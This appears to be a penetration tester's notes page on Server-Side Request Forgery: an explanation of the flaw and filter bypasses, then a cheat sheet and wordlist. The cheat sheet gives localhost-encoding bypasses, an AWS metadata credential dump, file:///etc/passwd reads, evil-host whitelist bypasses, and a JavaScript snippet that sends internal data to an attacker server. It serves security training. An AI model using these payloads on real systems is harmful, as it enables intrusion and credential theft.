RedTeam
3.Web-Hacking
4.Injection
SSRF
Commands

What is an SSRF?

SSRF stands for Server-Side Request Forgery. It's a vulnerability that allows a malicious user to cause the webserver to make an additional or edited HTTP request to the resource of the attacker's choosing.

  • Types of SSRF

    There are two types of SSRF vulnerability; the first is a regular SSRF where data is returned to the attacker's screen. The second is a Blind SSRF vulnerability where an SSRF occurs, but no information is returned to the attacker's screen.

  • What's the impact?

    A successful SSRF attack can result in any of the following: 

    • Access to unauthorised areas.
    • Access to customer/organisational data.
    • Ability to Scale to internal networks.
    • Reveal authentication tokens/credentials.
  • How to spot a SSRF

    • Complete URL
    • A partial URL such as just the hostname
    • Or perhaps only the path of the URL

    Some of these examples are easier to exploit than others, and this is where a lot of trial and error will be required to find a working payload.

    If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.

    More security-savvy developers aware of the risks of SSRF vulnerabilities may implement checks in their applications to make sure the requested resource meets specific rules. There are usually two approaches to this, either a deny list or an allow list.

  • Deny List

    A Deny List is where all requests are accepted apart from resources specified in a list or matching a particular pattern. A Web Application may employ a deny list to protect sensitive endpoints, IP addresses or domains from being accessed by the public while still allowing access to other locations. A specific endpoint to restrict access is the localhost, which may contain server performance data or further sensitive information, so domain names such as localhost and 127.0.0.1 would appear on a deny list. Attackers can bypass a Deny List by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127...*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.

    Also, in a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which contains metadata for the deployed cloud server, including possibly sensitive information. An attacker can bypass this by registering a subdomain on their own domain with a DNS record that points to the IP Address 169.254.169.254.

  • Allow List

    An allow list is where all requests get denied unless they appear on a list or match a particular pattern, such as a rule that an URL used in a parameter must begin with **https://website.thm.** An (opens in a new tab) attacker could quickly circumvent this rule by creating a subdomain on an attacker's domain name, such as https://website.thm.attackers-domain.thm (opens in a new tab). The application logic would now allow this input and let an attacker control the internal HTTP request.

  • Open Redirect

    If the above bypasses do not work, there is one more trick up the attacker's sleeve, the open redirect. An open redirect is an endpoint on the server where the website visitor gets automatically redirected to another website address. Take, for example, the link https://website.thm/link?url=https://tryhackme.com (opens in a new tab). This endpoint was created to record the number of times visitors have clicked on this link for advertising/marketing purposes. But imagine there was a potential SSRF vulnerability with stringent rules which only allowed URLs beginning with https://website.thm/ (opens in a new tab). An attacker could utilise the above feature to redirect the internal HTTP request to a domain of the attacker's choice.


Top Commands

Check SSRF on localhost + InternalIP
127.0.0.1 & 192.168.0.X

# SSRF with blacklist-based input filters
- Use an alternative IP representation: 127.0.0.1 ---> 2130706433, 017700000001, 127.1
- Register your own domain name that resolves to 127.0.0.1
- Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL

# If SSRF possible and target using AWS, fetch 169.254.169.254/user-data (Dump creds of serv)

# Using other protocol inside the SSRF path
- file:///etc/passwd
- gopher://
- ssh://
- ...

# Bypass whitelist (Find Open Redirect)
- https://expected-host:fakepassword@evil-host
- https://evil-host#expected-host
- https://expected-host.evil-host

# Bypassing SSRF filters via open redirection (Open redirect on weliketoshop)
ex: stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin

# Blind SSRF (Use javascript to retrieve SSRF)
fetch("http://vulnerable-server.com/fetch?url=http://internal-service.com/secret-data")
    .then(response => response.text())
    .then(data => {
        // Send exfiltrated data to attacker's server via GET request
        fetch("http://your-server.com/log?data=" + encodeURIComponent(data));
    });

# SSRF via Referer header
Change referer header and see if you get an out of band request

Wordlist

# Wordlist

http://localhost/
http://127.0.0.1/
http://127.1/
http://0000::1:80/

http://192.168.0.X/
http://10.0.0.X/
http://172.16.0.X/

http://[::]:80/
http://[::ffff:127.0.0.1]
http://2130706433/
http://whitelisteddomain@127.0.0.1/

http://0x7f000001/
http://0x0100007f/

http://017700000001/
http://0177.00.00.01/

--------------------------------------------------------------------------------
# Tip

If you're trying to bypass a restricted path, consider techniques often used for 403 bypasses, such as:

- Capitalization
- Encoding
- Double encoding
- Null byte injection
- ...

All Information ---> https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/Server%20Side%20Request%20Forgery/#bypass-localhost-with (opens in a new tab)